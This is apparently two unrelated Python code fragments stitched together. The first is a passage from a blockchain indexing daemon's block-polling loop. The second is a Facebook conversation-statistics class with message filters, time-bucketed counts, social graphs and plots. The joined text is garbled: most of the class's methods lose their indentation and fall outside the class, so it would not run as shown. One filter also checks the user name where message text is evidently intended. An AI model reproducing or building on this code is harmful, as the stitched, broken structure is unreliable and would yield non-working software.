            #update as CURRENT_BLOCK_INDEX catches up with BLOCKCHAIN_SERVICE_LAST_BLOCK and/or surpasses it (i.e. if blockchain service gets behind for some reason)
            try:
                block_height_response = blockchain.getinfo()
            except:
                block_height_response = None
            config.BLOCKCHAIN_SERVICE_LAST_BLOCK = block_height_response['info']['blocks'] if block_height_response else 0
        logging.info("Block: %i (message_index height=%s) (blockchain latest block=%s)" % (config.CURRENT_BLOCK_INDEX,
            config.LAST_MESSAGE_INDEX if config.LAST_MESSAGE_INDEX != -1 else '???',
            config.BLOCKCHAIN_SERVICE_LAST_BLOCK if config.BLOCKCHAIN_SERVICE_LAST_BLOCK else '???'))

        clean_mempool_tx()
    elif my_latest_block['block_index'] > last_processed_block['block_index']:
        #we have stale blocks (i.e. most likely a reorg happened in paytokensd)?? this shouldn't happen, as we
        # should get a reorg message. Just to be on the safe side, prune back MAX_REORG_NUM_BLOCKS blocks
        # before what paytokensd is saying if we see this
        logging.error("Very odd: Ahead of paytokensd with block indexes! Pruning back %s blocks to be safe." % config.MAX_REORG_NUM_BLOCKS)
        my_latest_block = prune_my_stale_blocks(last_processed_block['block_index'] - config.MAX_REORG_NUM_BLOCKS)
    else:
        #...we may be caught up (to paytokensd), but paytokensd may not be (to the blockchain). And if it isn't, we aren't
        config.CAUGHT_UP = running_info['db_caught_up']

        #this logic here will cover a case where we shut down payblockd, then start it up again quickly...
        # in that case, there are no new blocks for it to parse, so LAST_MESSAGE_INDEX would otherwise remain 0.
        # With this logic, we will correctly initialize LAST_MESSAGE_INDEX to the last message ID of the last processed block
        if config.LAST_MESSAGE_INDEX == -1 or config.CURRENT_BLOCK_INDEX == 0:
            if config.LAST_MESSAGE_INDEX == -1: config.LAST_MESSAGE_INDEX = running_info['last_message_index']
            if config.CURRENT_BLOCK_INDEX == 0: config.CURRENT_BLOCK_INDEX = running_info['last_block']['block_index']
            logging.info("Detected blocks caught up on startup. Setting last message idx to %s, current block index to %s ..." % (
                config.LAST_MESSAGE_INDEX, config.CURRENT_BLOCK_INDEX))

        if config.CAUGHT_UP and not config.CAUGHT_UP_STARTED_EVENTS:
            #start up recurring events that depend on us being fully caught up with the blockchain to run
            logging.debug("Starting event timer: compile_asset_pair_market_info")
            gevent.spawn(events.compile_asset_pair_market_info)
            logging.debug("Starting event timer: compile_asset_market_info")
            gevent.spawn(events.compile_asset_market_info)
            logging.debug("Starting event timer: compile_extended_asset_info")
            gevent.spawn(events.compile_extended_asset_info)
            logging.debug("Starting event timer: compile_extended_feed_info")
            gevent.spawn(events.compile_extended_feed_info)
            config.CAUGHT_UP_STARTED_EVENTS = True

        publish_mempool_tx()
        time.sleep(2) #payblockd itself is at least caught up, wait a bit to query again for the latest block from cpd
| |
from datetime import date, datetime, time
import math
from dateutil.rrule import rrule, DAILY, MONTHLY
import matplotlib.pyplot as plt
import networkx as nx
import nltk
from scipy.stats import chisquare
from message import Message
import plot
class EmptyConversationError(Exception):
    """Raised when a Conversation would be instantiated with no messages."""
    pass
# TODO: change timestamp to datetime
# TODO: user_to_message statistic can combine user filter and time_interval_to_message_statistic
'''
Represents a Facebook conversation.
'''
class Conversation:
    """Represents a Facebook conversation."""

    # Time-unit conversion constants.
    SECONDS_PER_MINUTE = 60
    MINUTES_PER_HOUR = 60
    HOURS_PER_DAY = 24
    MONTHS_PER_YEAR = 12

    # strftime/strptime format used for month-granularity bucketing.
    MONTH_FORMAT = '%Y-%m'

    # Supported granularities for per-time-interval statistics.
    TIME_INTERVALS = [
        'minute in hour',
        'minute in day',
        'hour',
        'date',
        'week',
        'month',
        'year',
    ]
def __init__(self, messages, users):
    """
    Args:
        messages: A nonempty list of Message objects in chronological
            order.
        users: A list of strings representing the users in the
            conversation.

    Raises:
        EmptyConversationError: messages is empty.
        ValueError: messages is not sorted by timestamp.
    """
    self.messages = messages
    self.users = users
    self.users_in_messages = set(message.user for message in self.messages)
    # Union of the users declared on the conversation and the users that
    # actually sent at least one message. These sets can differ: a
    # declared user may never have sent anything, and a sender may have
    # since left the conversation.
    self.users_union = set(self.users).union(self.users_in_messages)
    if not self.messages:
        raise EmptyConversationError()
    if not self.messages_are_sorted():
        raise ValueError('messages must be sorted by timestamp')
def __str__(self):
    """Returns a printable summary: the user list plus every message."""
    encoded_users = [user.encode('utf-8') for user in self.users]
    lines = ['Conversation with the users ' + str(encoded_users)]
    lines.extend(str(message) for message in self.messages)
    return '\n'.join(lines)
def __len__(self):
    """Returns the number of messages in the conversation."""
    return len(self.messages)
def __eq__(self, other):
    """Conversations are equal iff they share the same message list and the
    same set of users (user order is ignored)."""
    return (self.messages == other.messages and
            set(self.users) == set(other.users))
def __ne__(self, other):
    """Inverse of __eq__ (required explicitly under Python 2 semantics)."""
    return not (self == other)
def messages_are_sorted(self):
    """Returns True if messages are in nondecreasing timestamp order."""
    return all(earlier.timestamp <= later.timestamp
               for earlier, later in zip(self.messages, self.messages[1:]))
def filter_conversation(self, message_filter=lambda x: True,
user_filter=lambda x: True):
"""
Creates a new Conversation object after filtering self.messages and
self.users.
Args:
message_filter: A function that takes a Message object as input and
returns True or False.
user_filter: A function that takes a string as input and returns
True or False.
Returns:
filtered_conversation: A Conversation object whose messages are
self.messages after being filtered by message_filter and whose
users are self.users after being filtered by user_filter.
Raises:
EmptyConversationError: Filtering self.messages results in an empty
list.
"""
filtered_messages = filter(message_filter, self.messages)
filtered_users = filter(user_filter, self.users)
return Conversation(filtered_messages, filtered_users)
def filter_by_datetime(self, start_dt=datetime.min, end_dt=datetime.max):
"""
Returns a copy of self after filtering self.messages by messages that
lie in a datetime interval.
Args:
start_dt: A datetime object satisfying start_dt <= end_dt.
end_dt: A datetime object satisfying start_dt <= end_dt.
Returns:
A Conversation object that is equal to self after filtering by
messages whose datetimes are in the closed interval
[start_dt, end_dt].
Raises:
EmptyConversationError: Filtering self.messages results in an empty
list.
"""
if start_dt > end_dt:
raise ValueError("start_dt must be less than or equal to end_dt")
message_filter = lambda x: x.timestamp >= start_dt and x.timestamp <= end_dt
filtered = self.filter_conversation(message_filter=message_filter)
return filtered
def filter_by_users(self, users):
"""
Returns a copy of self after filtering self.messages by messages whose
users are in an input user list and after filtering self.users by users
in the input user list.
Args:
users: A list of strings representing users.
Returns:
A Conversation object that is equal to self after filtering
self.messages to only contain messages whose user is in users
and after filtering self.users to only contain users in users.
Raises:
EmptyConversationError: Filtering self.messages results in an empty
list.
"""
users_set = set(users)
message_filter = lambda x: x.user in users_set
user_filter = lambda x: x in users_set
filtered = self.filter_conversation(message_filter, user_filter)
return filtered
def filter_by_text_filter(self, text_filter):
message_filter = lambda x: text_filter(x.text)
filtered = self.filter_conversation(message_filter=message_filter)
return filtered
def get_minute_in_hour_to_message_statistic(self, message_statistic):
"""
Maps each minute in an hour to the sum of the values of a message
statistic over all messages from that minute.
Args:
message_statistic: A function mapping a Message object to an int or
a float.
Returns:
minute_in_hour_to_message_statistic: A dict mapping each integer in
range(60) to the sum of the values of message_statistic over
all messages in self.messages from that minute.
"""
minute_in_hour_to_message_statistic = {minute: 0 for minute in range(self.MINUTES_PER_HOUR)}
for message in self.messages:
minute_in_hour_to_message_statistic[message.timestamp.minute] += message_statistic(message)
return minute_in_hour_to_message_statistic
def get_minute_in_day_to_message_statistic(self, message_statistic):
"""
Maps each minute in a day to the sum of the values of a message
statistic over all messages from that minute.
Args:
message_statistic: A function mapping a Message object to an int or
a float.
Returns:
minute_in_day_to_message_statistic: A dict mapping a time object
representing a minute in a day to the sum of the values of
message_statistic over all messages in self.messages from that
minute.
"""
minute_in_day_to_message_statistic = {}
for hour in range(self.HOURS_PER_DAY):
for minute in range(self.MINUTES_PER_HOUR):
minute_in_day = time(hour, minute)
minute_in_day_to_message_statistic[minute_in_day] = 0
for message in self.messages:
minute_in_day = time(message.timestamp.hour, message.timestamp.minute)
minute_in_day_to_message_statistic[minute_in_day] += message_statistic(message)
return minute_in_day_to_message_statistic
def get_hour_to_message_statistic(self, message_statistic):
"""
Maps each hour to the sum of the values of a message statistic over all
messages from that hour.
Args:
message_statistic: A function mapping a Message object to an int or
a float.
Returns:
hour_to_message_statistic: A dict mapping each integer in
range(24) to the sum of the values of message_statistic over
all messages in self.messages from that hour.
"""
hour_to_message_statistic = {hour: 0 for hour in range(self.HOURS_PER_DAY)}
for message in self.messages:
hour_to_message_statistic[message.timestamp.hour] += message_statistic(message)
return hour_to_message_statistic
def get_date_to_message_statistic(self, message_statistic):
"""
Maps each date between the date of the first message and the date of
the last message, inclusive, to the sum of the values of a message
statistic over all messages from that date.
Args:
message_statistic: A function mapping a Message object to an int or
a float.
Returns:
date_to_message_statistic: A dict mapping a date object between the
date of the first message and the date of the last message to
the sum of the values of message_statistic over all messages in
self.messages from that date.
"""
start_date = self.messages[0].timestamp.date()
end_date = self.messages[-1].timestamp.date()
date_range = [dt.date() for dt in rrule(DAILY, dtstart=start_date, until=end_date)]
date_to_message_statistic = {d: 0 for d in date_range}
for message in self.messages:
date_to_message_statistic[message.timestamp.date()] += message_statistic(message)
return date_to_message_statistic
def get_month_to_message_statistic(self, message_statistic):
"""
Maps each month between the month of the first message and the month of
the last message, inclusive, to the sum of the values of a message
statistic over all messages from that month.
Args:
message_statistic: A function mapping a Message object to an int or
a float.
Returns:
month_to_message_statistic: A dict mapping a string of the form
'YYYY-MM' representing a month between the month of the first
message and the month of the last message to the sum of the
values of message_statistic over all messages in self.messages
from that month.
"""
start_dt = self.messages[0].timestamp
end_dt = self.messages[-1].timestamp
start_date_month_start = datetime(start_dt.year, start_dt.month, 1)
end_date_month_start = datetime(end_dt.year, end_dt.month, 1)
dt_month_range = rrule(MONTHLY, dtstart=start_date_month_start,
until=end_date_month_start)
month_range = [dt.date() for dt in dt_month_range]
month_to_message_statistic = {dt.strftime(self.MONTH_FORMAT): 0 for dt in month_range}
for message in self.messages:
month_str = message.timestamp.strftime(self.MONTH_FORMAT)
month_to_message_statistic[month_str] += message_statistic(message)
return month_to_message_statistic
def get_year_to_message_statistic(self, message_statistic):
"""
Maps each year between the year of the first message and the year of
the last message, inclusive, to the sum of the values of a message
statistic over all messages from that year.
Args:
message_statistic: A function mapping a Message object to an int or
a float.
Returns:
year_to_message_statistic: A dict mapping an int representing a
year between the year of the first message and the year of the
last message to the sum of the values of message_statistic over
all messages in self.messages from that year.
"""
start_year = self.messages[0].timestamp.year
end_year = self.messages[-1].timestamp.year
year_to_message_statistic = {year: 0 for year in range(start_year, end_year + 1)}
for message in self.messages:
year_to_message_statistic[message.timestamp.year] += message_statistic(message)
return year_to_message_statistic
def get_time_interval_to_message_statistic(self, time_interval,
message_statistic):
"""
Maps each value of time interval to the sum of the values of a message
statistic over all messages from that time interval value. Wrapper
function for the functions 'get_' + time_interval.replace(' ', '_') +
'_to_message_statistic'.
Args:
time_interval: One of 'minute in hour', 'minute in day', 'hour',
'date', 'week', 'month', 'year'.
message_statistic: A function mapping a Message object to an int or
a float.
Returns:
time_interval_to_message_statistic: A dict mapping each value of a
time interval to the sum of the values of message_statistic
over all messages in self.messages from that time interval
value.
"""
if time_interval not in self.TIME_INTERVALS:
raise ValueError('time_interval must be in {}'.format(self.TIME_INTERVALS))
getter = getattr(self, 'get_' + time_interval.replace(' ', '_') + '_to_message_statistic')
time_interval_to_message_statistic = getter(message_statistic)
return time_interval_to_message_statistic
def get_time_interval_to_n_messages(self, time_interval):
if time_interval not in self.TIME_INTERVALS:
raise ValueError('time_interval must be in {}'.format(self.TIME_INTERVALS))
message_statistic = lambda x: 1
return self.get_time_interval_to_message_statistic(time_interval, message_statistic)
def get_time_interval_to_word_count(self, time_interval, word):
if time_interval not in self.TIME_INTERVALS:
raise ValueError('time_interval must be in {}'.format(self.TIME_INTERVALS))
if ' ' in word:
raise ValueError('word cannot contain spaces')
message_statistic = lambda x: self.word_count(x, word)
return self.get_time_interval_to_message_statistic(time_interval, message_statistic)
def get_user_to_messages(self):
user_to_messages = {}
for message in self.messages:
user = message.user
if user not in user_to_messages:
user_to_messages[user] = [message]
else:
user_to_messages[user].append(message)
return user_to_messages
def get_user_to_text(self):
"""
Maps a user to a string containing each of the user's message texts
separated by a newline.
"""
user_to_messages = self.get_user_to_messages()
user_to_text = {}
for user in user_to_messages:
message_texts = [m.text for m in user_to_messages[user]]
user_to_text[user] = '\n'.join(message_texts)
return user_to_text
    @staticmethod
    def word_count(message, word):
        """
        Computes the number of times a word appears in a message
        (case-insensitive).
        Args:
            message: A Message object.
            word: A string with no spaces.
        Returns:
            An int representing the number of times word (case-insensitive)
            appears among the tokens of the message text as produced by
            nltk.word_tokenize.
        Raises:
            ValueError: word contains a space.
        """
        if ' ' in word:
            raise ValueError('word cannot contain spaces')
        # Tokenization uses nltk.word_tokenize rather than a plain whitespace
        # split, so punctuation is separated from adjacent words.
        lowercase_tokens = [token.lower() for token in nltk.word_tokenize(message.text)]
        return lowercase_tokens.count(word.lower())
def minute_difference(self, dt1, dt2):
"""
Computes the difference between two datetimes in minutes.
Args:
dt1: A datetime such that dt1 >= dt2.
dt2: A datetime such that dt1 >= dt2.
Returns:
A float representing the number of minutes between dt2 and dt1.
"""
if dt1 < dt2:
raise ValueError('Must have dt1 >= dt2')
difference = dt1 - dt2
return self.HOURS_PER_DAY*self.MINUTES_PER_HOUR*difference.days + difference.seconds / float(self.SECONDS_PER_MINUTE)
def exp_damped_minute_difference(self, dt1, dt2, alpha):
"""
Computes exp(-alpha * t), where t is the difference between two
datetimes in minutes.
Args:
dt1: A datetime such that dt1 >= dt2.
dt2: A datetime such that dt1 >= dt2.
alpha: A nonnegative float representing the damping factor.
Returns:
A float equal to exp(-alpha * t), where t is the difference between
two datetimes in minutes.
"""
if dt1 < dt2:
raise ValueError('Must have dt1 >= dt2')
if alpha < 0:
raise ValueError('Must have alpha >= 0')
t = self.minute_difference(dt1, dt2)
return math.exp(-alpha * t)
def exp_damped_day_difference(self, dt1, dt2, alpha):
"""
Computes exp(-alpha * t), where t is the difference between two
datetimes in days.
Args:
dt1: A datetime such that dt1 >= dt2.
dt2: A datetime such that dt1 >= dt2.
alpha: A nonnegative float representing the damping factor.
Returns:
A float equal to exp(-alpha * t), where t is the difference between
two datetimes in days.
"""
if dt1 < dt2:
raise ValueError('Must have dt1 >= dt2')
if alpha < 0:
raise ValueError('Must have alpha >= 0')
minute_diff = self.minute_difference(dt1, dt2)
day_diff = float(minute_diff) / (self.HOURS_PER_DAY * self.MINUTES_PER_HOUR)
return math.exp(-alpha * day_diff)
def get_user_to_initiated_messages(self, minute_cutoff):
"""
Creates a list of initiated messages for each user.
Args:
minute_cutoff: A nonnegative int representing the minimum number
of minutes between consecutive messages for the second message
to be considered an initiated message.
Returns:
user_to_initiated_messages: A dict mapping each user in
self.users_union to a list of messages initiated by that user.
We consider a message to be initiated if it is the first
message of the conversation or if at least minute_cutoff
minutes have passed since the previous message.
"""
if minute_cutoff < 0:
raise ValueError('minute_cutoff must be a nonnegative int')
user_to_initiated_messages = {user: [] for user in self.users_union}
for (i, message) in enumerate(self.messages):
# First message in conversation is initiated
if i == 0:
user_to_initiated_messages[message.user].append(message)
# See if at least minute_cutoff minutes have passed since the last message
elif self.minute_difference(message.timestamp, self.messages[i-1].timestamp) >= minute_cutoff:
user_to_initiated_messages[message.user].append(message)
return user_to_initiated_messages
def get_user_to_n_initiated_messages(self, minute_cutoff):
user_to_initiated_messages = self.get_user_to_initiated_messages(minute_cutoff)
return {user: len(user_to_initiated_messages[user]) for user in user_to_initiated_messages}
def get_user_to_proportion_initiated(self, cutoff_min, cutoff_max):
"""
Maps each user to a list of proportions of messages initiated by that
user for cutoff_min <= minute_cutoff <= cutoff_max.
Args:
cutoff_min: A nonnegative int representing the minimum
minute_cutoff. Must satisfy cutoff_min <= cutoff_max.
cutoff_max: A nonnegative int representing the maximum
minute_cutoff. Must satisfy cutoff_min <= cutoff_max.
Returns:
x: A list of ints between cutoff_min and cutoff_max, inclusive.
user_to_proportion_initiated: A dict that maps each user in
self.users_union to a list proportion_initiated such that
proportion_initiated[i] is the proportion of messages initiated
by user with minute_cutoff = x[i].
"""
if cutoff_min < 0:
raise ValueError('cutoff_min must be a nonnegative int')
if cutoff_max < 0:
raise ValueError('cutoff_max must be a nonnegative int')
if cutoff_min > cutoff_max:
raise ValueError('cutoff_min must be less than or equal to cutoff_max')
x = range(cutoff_min, cutoff_max + 1)
user_to_proportion_initiated = {}
for minute_cutoff in x:
user_to_n_initiated_messages = self.get_user_to_n_initiated_messages(minute_cutoff)
# always positive because first message is initiated message
total_n_initiated = sum(user_to_n_initiated_messages.values())
for user in user_to_n_initiated_messages:
prop = user_to_n_initiated_messages[user] / float(total_n_initiated)
if user not in user_to_proportion_initiated:
user_to_proportion_initiated[user] = [prop]
else:
user_to_proportion_initiated[user].append(prop)
return (x, user_to_proportion_initiated)
def get_user_to_end_messages(self, minute_cutoff):
"""
Creates a list of end messages for each user.
Args:
minute_cutoff: A nonnegative int representing the minimum number of
minutes between consecutive messages for the first message to
be considered an end message.
Returns:
user_to_end_messages: A dict mapping each user in self.users_union
to a list of end messages by that user. We call a message an
end message if it is the last message of the conversation or if
at least minute_cutoff minutes passed before the next message.
"""
if minute_cutoff < 0:
raise ValueError('minute_cutoff must be a nonnegative int')
user_to_end_messages = {user: [] for user in self.users_union}
for (i, message) in enumerate(self.messages):
# Last message in conversation is an end message
if i == len(self.messages) - 1:
user_to_end_messages[message.user].append(message)
# See if at least minute_cutoff minutes pass before the next message
elif self.minute_difference(self.messages[i+1].timestamp, message.timestamp) >= minute_cutoff:
user_to_end_messages[message.user].append(message)
return user_to_end_messages
def get_user_to_n_end_messages(self, minute_cutoff):
user_to_end_messages = self.get_user_to_end_messages(minute_cutoff)
return {user: len(user_to_end_messages[user]) for user in user_to_end_messages}
def get_user_to_proportion_end(self, cutoff_min, cutoff_max):
"""
Maps each user to a list of proportions of messages ended by that user
for cutoff_min <= minute_cutoff <= cutoff_max.
Args:
cutoff_min: A nonnegative int representing the minimum
minute_cutoff. Must satisfy cutoff_min <= cutoff_max.
cutoff_max: A nonnegative int representing the maximum
minute_cutoff. Must satisfy cutoff_min <= cutoff_max.
Returns:
x: A list of ints between cutoff_min and cutoff_max, inclusive.
user_to_proportion_end: A dict that maps each user in
self.users_union to a list proportion_end such that
proportion_end[i] is the proportion of messages ended by user
with minute_cutoff = x[i].
"""
if cutoff_min < 0:
raise ValueError('cutoff_min must be a nonnegative int')
if cutoff_max < 0:
raise ValueError('cutoff_max must be a nonnegative int')
if cutoff_min > cutoff_max:
raise ValueError('cutoff_min must be less than or equal to cutoff_max')
x = range(cutoff_min, cutoff_max + 1)
user_to_proportion_end = {}
for minute_cutoff in x:
user_to_n_end_messages = self.get_user_to_n_end_messages(minute_cutoff)
# always positive because last message is initiated message
total_n_end = sum(user_to_n_end_messages.values())
for user in user_to_n_end_messages:
prop = user_to_n_end_messages[user] / float(total_n_end)
if user not in user_to_proportion_end:
user_to_proportion_end[user] = [prop]
else:
user_to_proportion_end[user].append(prop)
return (x, user_to_proportion_end)
# Returns the messages containing at least one word in words by user user
# words - list of words
def messages_containing_words_by_user(self, words, user):
return filter(lambda x: x.user == user and not set(x.user).isdisjoint(words), self.messages)
def n_messages_containing_words_by_user(self, words, user):
return len(self.messages_containing_words_by_user(words, user))
def get_user_to_message_statistic(self, message_statistic):
"""
Maps each user in self.users_union to the sum of the values of
message_statistic over all messages by that user.
Args:
message_statistic: A function mapping a Message object to an int or
a float.
Returns:
user_to_message_statistic: A dict mapping each user in
self.users_union to the sum of the values of message_statistic
over all messages in self.messages sent by that user.
"""
user_to_message_statistic = {user: 0 for user in self.users_union}
for message in self.messages:
user_to_message_statistic[message.user] += message_statistic(message)
return user_to_message_statistic
def get_user_to_n_messages(self):
return self.get_user_to_message_statistic(lambda x: 1)
def get_user_to_damped_n_messages(self, dt_max, alpha):
"""
Maps each user to the number of messages before a reference datetime,
where each message count is exponentially damped by a constant times
the difference between the reference datetime and the datetime of the
message.
Args:
dt_max: A datetime representing the max datetime of messages
to consider.
alpha: A nonnegative float representing the damping factor.
Returns:
user_to_damped_n_messages: A dict mapping each user in
self.users_union to the damped number of messages by that user
before dt_max. The contribution of a message is a float equal
to exp(-alpha * t), where t is the difference in days between
dt_max and the datetime of the message.
"""
if alpha < 0:
raise ValueError('Must have alpha >= 0')
try:
# Only keep messages with datetimes <= dt_max
filtered = self.filter_by_datetime(end_dt=dt_max)
except EmptyConversationError:
# Map all users to 0 if dt_max occurs before all messages
return self.get_user_to_message_statistic(lambda x: 0)
damped_message_count = lambda x: self.exp_damped_day_difference(dt_max, x.timestamp, alpha)
user_to_damped_n_messages = filtered.get_user_to_message_statistic(damped_message_count)
return user_to_damped_n_messages
def get_user_to_word_count(self, word):
"""
Maps each user to the number of times they say a word
(case-insensitive).
Args:
word: A string with no spaces.
Returns:
user_to_word_count: A dict mapping each user in self.users_union to
the number of times word (case-insensitive) appears in messages
by the user, where we split each message into tokens using
spaces.
"""
if ' ' in word:
raise ValueError('word cannot contain spaces')
message_statistic = lambda x: self.word_count(x, word)
user_to_word_count = self.get_user_to_message_statistic(message_statistic)
return user_to_word_count
def sum_conversation_message_statistic(self, message_statistic):
"""
Sums a message statistic over all messages.
Args:
message_statistic: A function mapping a Message object to an int or
a float.
Returns:
A float equal to the sum of the values of message_statistic over
all messages in self.messages.
"""
return sum(message_statistic(message) for message in self.messages)
def damped_n_messages(self, dt_max, alpha):
"""
Computes the sum of damped message counts before a reference datetime,
where each damped message count is exponentially damped by a constant
times the difference between the reference datetime and the datetime of
the message.
Args:
dt_max: A datetime representing the max datetime of messages to
consider.
alpha: A nonnegative float representing the damping factor.
Returns:
damped_n_messages_total: A float equal to the sum of damped message
counts before dt_max. The contribution of a message is
exp(-alpha * t), where t is the difference in days between
dt_max and the datetime of the message.
"""
if alpha < 0:
raise ValueError('Must have alpha >= 0')
try:
# Only keep messages with datetimes <= dt_max
filtered = self.filter_by_datetime(end_dt=dt_max)
except EmptyConversationError:
# dt_max occurs before all messages
return 0
damped_message_count = lambda x: self.exp_damped_day_difference(dt_max, x.timestamp, alpha)
damped_n_messages_total = filtered.sum_conversation_message_statistic(damped_message_count)
return damped_n_messages_total
def get_alpha_to_damped_n_messages(self, dt_max, alpha_min, alpha_max, n_alphas):
if alpha_min < 0:
raise ValueError('Must have alpha_min >= 0')
if alpha_min > alpha_max:
raise ValueError('Must have alpha_min <= alpha_max')
if n_alphas <= 1:
raise ValueError('Must have n_alphas >= 2')
alpha_to_damped_n_messages = {}
for k in range(n_alphas):
# Linearly interpolate alphas
t = k/float(n_alphas - 1)
alpha = (1 - t)*alpha_min + t*alpha_max
alpha_to_damped_n_messages[alpha] = self.damped_n_messages(dt_max, alpha)
return alpha_to_damped_n_messages
"""
Distributions
"""
def get_message_statistic_distribution(self, message_statistic):
"""
Computes the distribution of a message function over all messages.
Args:
message_statistic: A function mapping a Message object to an int or
a float.
Returns:
A list of floats equal to the values of message_statistic applied
to each message in self.messages.
"""
return [message_statistic(message) for message in self.messages]
def get_message_length_distribution(self):
"""
Computes the distribution of messages lengths (number of characters).
Returns:
A list of ints equal to the lengths of the texts of the messages in
self.messages.
"""
message_statistic = lambda x: len(x.text)
return self.get_message_statistic_distribution(message_statistic)
def get_message_statistic_in_time_interval(self, time_interval, message_statistic):
"""
Returns the values of get_time_interval_to_message_statistic() sorted
by key.
"""
time_interval_to_message_statistic = self.get_time_interval_to_message_statistic(time_interval, message_statistic)
return [time_interval_to_message_statistic[t] for t in sorted(time_interval_to_message_statistic.keys())]
def get_n_messages_in_time_interval(self, time_interval):
return self.get_message_statistic_in_time_interval(time_interval, lambda x: 1)
def n_messages_chi_square(self, time_interval):
"""
Computes a chi square test against the null hypothesis that the number
of messages is uniformly distributed across the time interval. Only
makes sense for the time intervals 'minute in hour', 'minute in day',
'hour' since those ones have a fixed number of values.
Args:
time_interval: One of 'minute in hour', 'minute in day', 'hour'.
Returns:
chisq: A float representing the chi square statistic where the
observations consist of the number of messages in each value of
time_interval and the null hypothesis is that the number of
messages is uniformly distributed.
p: A float representing the p-value of the chi square test.
"""
valid_time_intervals = ['minute in hour', 'minute in day', 'hour']
if time_interval not in valid_time_intervals:
raise ValueError('time_interval must be in {}'.format(valid_time_intervals))
result = chisquare(self.get_n_messages_in_time_interval(time_interval))
return (result.statistic, result.pvalue)
"""
Directed graphs representing the conversation as different types of social networks
"""
def directed_graph_minute_cutoff(self, minute_cutoff, self_loops=False):
"""
Creates a weighted directed graph representing the conversation as a
social network. The weight of edge (u1, u2) is the number of times user
u1 responds to u2 in the conversation. We say that u1 responds to u2
when there exist two consecutive messages m2, m1 by u2, u1 such that
the number of minutes between m2 and m1 is at most a fixed cutoff
value.
Args:
minute_cutoff: A nonnegative int representing the maximum number of
minutes between two messages for the second message to be
considered a response to the first message.
self_loops: A boolean representing whether or not to include edges
that connect a vertex to itself.
Returns:
G: A DiGraph object whose vertex set is self.users_union. The
weight of edge (u1, u2) is the number of times u1 responds to
u2. We say that u1 responds to u2 when there exist two
consecutive messages m2, m1 by u2, u1 such that the number of
minutes between m2 and m1 is at most minute_cutoff. If u1 never
responds to u2, then (u1, u2) is not an edge.
"""
if minute_cutoff < 0:
raise ValueError('minute_cutoff must be a nonnegative int')
G = nx.DiGraph()
G.add_nodes_from(self.users_union)
for (i, message) in enumerate(self.messages):
# Consider consecutive message pairs
if i > 0:
last_message = self.messages[i-1]
if self.minute_difference(message.timestamp, last_message.timestamp) <= minute_cutoff:
user1 = message.user
user2 = last_message.user
if user2 not in G[user1]:
G.add_edge(user1, user2, weight=1)
else:
G[user1][user2]['weight'] += 1
# Remove self-loops if necessary
if not self_loops:
G.remove_edges_from(G.selfloop_edges())
return G
# TODO: visualize conversation intensity, set max number of nodes, remove self-loops
def directed_graph_name_mentions(self, self_loops=False):
"""
Creates a weighted directed graph representing the conversation as a
social network. The weight of edge (u1, u2) is the number of times user
u1 says the first name of user u2. To avoid ambiguity, we require that
all users in self.users_union have distinct first names
(case-insensitive).
Args:
self_loops: A boolean representing whether or not to include edges
that connect a vertex to itself.
Returns:
G: A DiGraph object whose vertex set is self.users_union. The
weight of edge (u1. u2) is the number of times u1 says the
first name of u2. We are case-insensitive, so if u2's name is
'Simon Zheng' and u1 says 'simon', then this counts. In
addition, we count instances of the name preceded by a '@', so
'@simon' would count in the previous example. If u1 never
mentions u2's name, then (u1, u2) is not an edge.
"""
user_to_first_name = {user: user.split(' ')[0].lower()
for user in self.users_union}
if len(set(user_to_first_name.values())) != len(self.users_union):
raise ValueError('The first names in self.users_union must be distinct')
G = nx.DiGraph()
G.add_nodes_from(self.users_union)
for message in self.messages:
user1 = message.user
for user2 in self.users_union:
name_count = self.word_count(message, user_to_first_name[user2])
# Include hashtag name mentions
name_count += self.word_count(message, '@' + user_to_first_name[user2])
if name_count > 0:
if user2 not in G[user1]:
G.add_edge(user1, user2, weight=name_count)
else:
G[user1][user2]['weight'] += name_count
# Remove self-loops if necessary
if not self_loops:
G.remove_edges_from(G.selfloop_edges())
return G
    # plot centrality measures as bar charts
    def get_user_to_eigenvector_centrality(self, G):
        """
        Computes the eigenvector centrality of each node in a graph.
        Args:
            G: A networkx graph (e.g. built by the directed_graph_* methods)
                whose nodes are users.
        Returns:
            A dict mapping each node of G to its eigenvector centrality.
        """
        return nx.eigenvector_centrality(G)
"""
Plots
"""
    def plot_message_statistic_by_time(self,
                                       time_interval_to_message_statistic,
                                       time_interval, y_label,
                                       bar_chart=True):
        """
        Plots the sum of the values of a message statistic from messages in a
        time interval against the time interval. Plots a bar chart or a line
        graph. We suggest using a line graph when the number of values of the
        time interval is large, such as when the time interval is 'minute in
        day' or 'date'.
        Args:
            time_interval_to_message_statistic: A dict mapping each value of a
                time interval to the sum of the values of a message statistic
                over all messages in self.messages from that time interval
                value.
            time_interval: One of 'minute in hour', 'minute in day', 'hour',
                'date', 'week', 'month', 'year'.
            y_label: A string representing the label for the y-axis.
            bar_chart: A boolean that is True if you want to plot a bar chart
                and False if you want to plot a line graph.
        Raises:
            ValueError: time_interval is not in TIME_INTERVALS.
        """
        if time_interval not in self.TIME_INTERVALS:
            raise ValueError('time_interval must be in {}'.format(self.TIME_INTERVALS))
        # Create title and labels
        if time_interval == 'minute in hour':
            x_label = 'Minute in Hour'
        elif time_interval == 'minute in day':
            x_label = 'Minute in Day'
        else:
            x_label = time_interval.capitalize()
        title = y_label + ' by ' + x_label
        # Plot bar chart
        if bar_chart:
            plot.plot_bar_chart(time_interval_to_message_statistic, title,
                                x_label, y_label)
        # Plot line graph
        else:
            # Convert times to datetimes because matplotlib can't plot times
            # along the x-axis but can plot datetimes along the x-axis
            if time_interval == 'minute in day':
                dt_to_message_statistic = {}
                for t in time_interval_to_message_statistic:
                    # The date component is arbitrary; only the time-of-day
                    # matters for the plot.
                    arbitrary_date = date(2000, 1, 1)
                    dt = datetime.combine(arbitrary_date, t)
                    dt_to_message_statistic[dt] = time_interval_to_message_statistic[t]
                time_interval_to_message_statistic = dt_to_message_statistic
            # Convert month strings to datetimes because matplotlib can't plot
            # strings along the x-axis but can plot datetimes along the x-axis
            elif time_interval == 'month':
                dt_to_message_statistic = {}
                for month_str in time_interval_to_message_statistic:
                    dt = datetime.strptime(month_str, self.MONTH_FORMAT)
                    dt_to_message_statistic[dt] = time_interval_to_message_statistic[month_str]
                time_interval_to_message_statistic = dt_to_message_statistic
            plot.plot_line_graph(time_interval_to_message_statistic, title, x_label, y_label)
def plot_n_messages_by_time(self, time_interval, bar_chart=True):
time_interval_to_n_messages = self.get_time_interval_to_n_messages(time_interval)
y_label = 'Number of Messages'
self.plot_message_statistic_by_time(time_interval_to_n_messages,
time_interval, y_label,
bar_chart=bar_chart)
